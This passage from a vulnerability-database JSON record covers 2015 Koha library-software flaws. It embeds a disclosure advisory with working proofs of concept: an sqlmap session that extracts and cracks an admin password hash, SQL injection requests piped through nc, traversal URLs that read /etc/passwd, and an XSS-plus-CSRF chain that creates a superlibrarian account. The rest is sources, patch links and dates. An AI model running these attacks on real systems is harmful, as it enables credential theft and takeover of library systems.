ug.cgi?id=14423\n\n===============================================================================================\n\n=========================\n1. Mutiple SQL Injections\n=========================\n\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) \u00a0 +\n+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +\n\nVulnerability:\n--------------\nThe url parameter \u0027number\u0027 in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. Feed john the ripper and be lucky\n\n\u00a0 \u00a0root@kali:/home/wicked# echo \"$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\" \u003e ./admin-pass\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass\u00a0\n\u00a0 \u00a0Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])\n\u00a0 \u00a0admin \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0(?)\n\u00a0 \u00a0guesses: 1 \u00a0time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) \u00a0c/s: 260 \u00a0trying: Smokey - allstate\n\u00a0 \u00a0Use the \"--show\" option to display all of the cracked passwords reliably\n\n\u00a0 \u00a0root@kali:/home/wicked# john ./admin-pass --show\n\u00a0 \u00a0?:admin\n\n\u00a0 \u00a01 password hash cracked, 0 left\n\n4. If the webserver is misconfigured, read \u0026 write access to the filesystem may be possible. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n====================================================================\n1. \"Criteria\" Parameter, Payload: ELT(1=1,\u0027evil\u0027) / ELT(1=2,\u0027evil\u0027)\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=2,\u0027evil\u0027)\" | nc testbox 9002\n\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 186\\r\\n\\r\\nFilter=P_COM\u0026Filter=\u0026Limit=\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=%3B\u0026report_name=\u0026do_it=1\u0026userid=\u003cusername\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026koha_login_context=intranet\u0026Criteria=ELT(1=1,\u0027evil\u0027)\" | nc testbox 9002\n\n====================================================================\n2. \"Filter\" Parameter, Payload: P_COM\u0027+AND+\u0027a\u0027=\u0027a / P_COM\u0027+AND+\u0027a\u0027=\u0027b\n====================================================================\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027a\" | nc testbox 9002\n\necho -ne \"POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\\r\\nHost: testbox:9002\\r\\nContent-Length: 183\\r\\n\\r\\nkoha_login_context=intranet\u0026Limit=\u0026Criteria=branchcode\u0026output=file\u0026basename=Export\u0026MIME=CSV\u0026sep=;\u0026report_name=\u0026do_it=1\u0026userid=\u003cuserid\u003e\u0026password=\u003cpassword\u003e\u0026branch=\u0026Filter=P_COM\u0027+AND+\u0027a\u0027=\u0027b\" | nc testbox 9002\n\n====================================================================\n\nYou will notice different output in every second request, demonstrating the evaluation of the payload. \n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n3. \n\nReferences\n----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nThe following input is used to print out /etc/passwd:\n\n/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\n\n# ################################################################################################## #\n# PoC End\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n=================================\n4. The site also lacks in the implementation of challenge tokens that prevent cross-site\u00a0\nforgery (XSRF) attacks. \u00a0\n\nThe attack can be performed by:\n\n- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)\n- through a user clicking a malicious link (phishing mail, forum link etc.)\n\nThe following pages are affected from stored XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl\n/cgi-bin/koha/virtualshelves/shelves.pl\n\nThe following pages are affected from relfective XSS flaws:\n\n/cgi-bin/koha/opac-shelves.pl \t\t\t\t(parameters: \"direction\", \"display\")\n/cgi-bin/koha/opac-search.pl \t\t\t\t (parameters: \"tag\")\n/cgi-bin/koha/authorities/authorities-home.pl \t\t(parameters: \"value\")\u00a0\n/cgi-bin/koha/acqui/lateorders.pl \t\t\t (parameters: \"delay\")\n/cgi-bin/koha/admin/auth_subfields_structure.pl \t(parameters: \"authtypecode\",\"tagfield\")\n/cgi-bin/koha/admin/marc_subfields_structure.pl\t(parameters: \"tagfield\")\n/cgi-bin/koha/catalogue/search.pl\t\t\t (parameters: \"limit\")\n/cgi-bin/koha/serials/serials-search.pl\t\t\t(parameters: \"bookseller_filter\", \"callnumber_filter\", \"EAN_filter\", \"ISSN_filter\", \"publisher_filter\", \"title_filter\")\u00a0\n/cgi-bin/koha/suggestion/suggestion.pl \t\t\t(parameters: \"author\", \"collectiontitle\", \"copyrightdate\", \"isbn\", \"manageddate_from\", \"manageddate_to\", \"publishercode\", \n \"suggesteddate_from\", \"suggesteddate_to\")\n\nImpact\n----------\nThe vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:\n\n- escalate privileges by targeting staff members with XSRF\u00a0\n- target users via browser exploits\n- target the webserver by combining with other server-side vulnerabilities. \u00a0\n\nReferences\n----------------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\n# ################################################################################################## #\n# PoC / Attack Scenario: \t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\nAlice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:\n\n--\u003e http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=Malicious+Input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0\n\nBob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens\u00a0\n\n--\u003e http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl\n\nthe malcious code get\u0027s executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:\n\nCreate new user:\n-----------------------\n\n--\u003e http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026B_address=\u0026B_address2=\u0026B_city=\u0026B_state=\u0026B_zipcode=\u0026B_country=\u0026B_phone=\u0026B_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress\u0026category_type=A\u0026updtype=I\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2F06%2F2000\u0026address=fictional\u0026select_city=%7C%7C%7C\u0026cardnumber=9182734629182364\u0026branchcode=MAURES\u0026categorycode=P_COM\u0026dateenrolled=24%2F06%2F2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=PROFESSION\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=Save\u0026setting_extended_patron_attributes=1\n\nGive the new user superlibririan permission:\n----------------------------------------------------------\n\n--\u003e http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian\n\nThe attacker can now log as superlibrarian. \n\nSide Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link. \nAlice needs to have access to the OPAC interface and to have permissions to create public lists. \n\n# ################################################################################################## #\n# PoC / Attack Scenario End\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n\n\n\n\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-4632"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "PACKETSTORM",
"id": "132458"
}
],
"trust": 4.77
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=37388",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2015-4632"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "75426",
"trust": 3.9
},
{
"db": "NVD",
"id": "CVE-2015-4632",
"trust": 2.9
},
{
"db": "PACKETSTORM",
"id": "132458",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "37388",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2015-05198",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05201",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05199",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05200",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05197",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2015-4632",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"id": "VAR-201810-0025",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
],
"trust": 3.5804196
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 3.0
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
}
]
},
"last_update_date": "2024-11-23T21:52:48.381000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug 14408",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"title": "Koha 3.14.16 released",
"trust": 0.8,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"title": "Security Release - Koha 3.16.12",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"title": "Security Release - Koha 3.18.8",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"title": "Security Release - Koha 3.20.1",
"trust": 0.8,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"title": "Koha directory traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62257"
},
{
"title": "Patch for Koha cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62260"
},
{
"title": "Koha HTML Injection Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62258"
},
{
"title": "Patch for Koha Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62259"
},
{
"title": "Patch for Koha SQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/62255"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/ARPSyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.6,
"url": "http://www.securityfocus.com/bid/75426"
},
{
"trust": 2.5,
"url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
},
{
"trust": 2.1,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
},
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/37388/"
},
{
"trust": 1.8,
"url": "https://koha-community.org/security-release-koha-3-20-1/"
},
{
"trust": 1.8,
"url": "https://koha-community.org/security-release-koha-3-18-8/"
},
{
"trust": 1.8,
"url": "https://koha-community.org/security-release-koha-3-16-12/"
},
{
"trust": 1.7,
"url": "https://seclists.org/fulldisclosure/2015/jun/80"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/132458/koha-ils-3.20.x-csrf-xss-traversal-sql-injection.html"
},
{
"trust": 1.7,
"url": "https://koha-community.org/koha-3-14-16-released/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4632"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-4632"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
},
{
"trust": 0.4,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
},
{
"trust": 0.1,
"url": "http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10"
},
{
"trust": 0.1,
"url": "http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=\u0026destination=\u0026check_member=\u0026borrowernumber=\u0026nodouble=\u0026title=\u0026firstname=\u0026othernames=\u0026sex=\u0026streetnumber=\u0026streettype=\u0026address2=\u0026city=\u0026state=\u0026zipcode=\u0026country=\u0026phone=\u0026phonepro=\u0026mobile=\u0026email=\u0026emailpro=\u0026fax=\u0026b_address=\u0026b_address2=\u0026b_city=\u0026b_state=\u0026b_zipcode=\u0026b_country=\u0026b_phone=\u0026b_email=\u0026contactnote=\u0026altcontactsurname=\u0026altcontactfirstname=\u0026altcontactaddress1=\u0026altcontactaddress2=\u0026altcontactaddress3=\u0026altcontactstate=\u0026altcontactzipcode=\u0026altcontactcountry=\u0026altcontactphone=\u0026sort1=\u0026sort2=\u0026dateexpiry=\u0026opacnote=\u0026borrowernotes=\u0026patron_attr_1=\u0026borrowermandatoryfield=surname%7cdateofbirth%7ccardnumber%7caddress\u0026category_type=a\u0026updtype=i\u0026op=insert\u0026surname=hacker\u0026dateofbirth=10%2f06%2f2000\u0026address=fictional\u0026select_city=%7c%7c%7c\u0026cardnumber=9182734629182364\u0026branchcode=maures\u0026categorycode=p_com\u0026dateenrolled=24%2f06%2f2015\u0026userid=hacker\u0026password=hacker\u0026password2=hacker\u0026patron_attr_1_code=profession\u0026setting_messaging_prefs=1\u0026modify=yes\u0026borrowernumber=\u0026save=save\u0026setting_extended_patron_attributes=1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4631"
},
{
"trust": 0.1,
"url": "http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855\u0026newflags=1\u0026flag=superlibrarian"
},
{
"trust": 0.1,
"url": "http://wiki.koha-community.org/wiki/sql_reports_library#superlibrarians"
},
{
"trust": 0.1,
"url": "http://www.koha-community.org/"
},
{
"trust": 0.1,
"url": "http://\u003cstaff-interface\u003e/cgi-bin/koha/virtualshelves/shelves.pl"
},
{
"trust": 0.1,
"url": "http://\u003copac-interface\u003e/cgi-bin/koha/opac-shelves.pl?shelves=1\u0026addshelf=malicious+input+\u003cscript+src=\u0027http://cst.sba-research.org/x.js\u0027/\u003e\u0026sortfield=title\u0026category=2\u0026allow_add=0\u0026allow_delete_own=1\u0026allow_delete_other=0"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-4633"
},
{
"trust": 0.1,
"url": "http://sqlmap.org"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"db": "BID",
"id": "75426"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"date": "2015-06-26T23:02:22",
"db": "PACKETSTORM",
"id": "132458"
},
{
"date": "2015-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"date": "2018-10-18T21:29:01.333000",
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
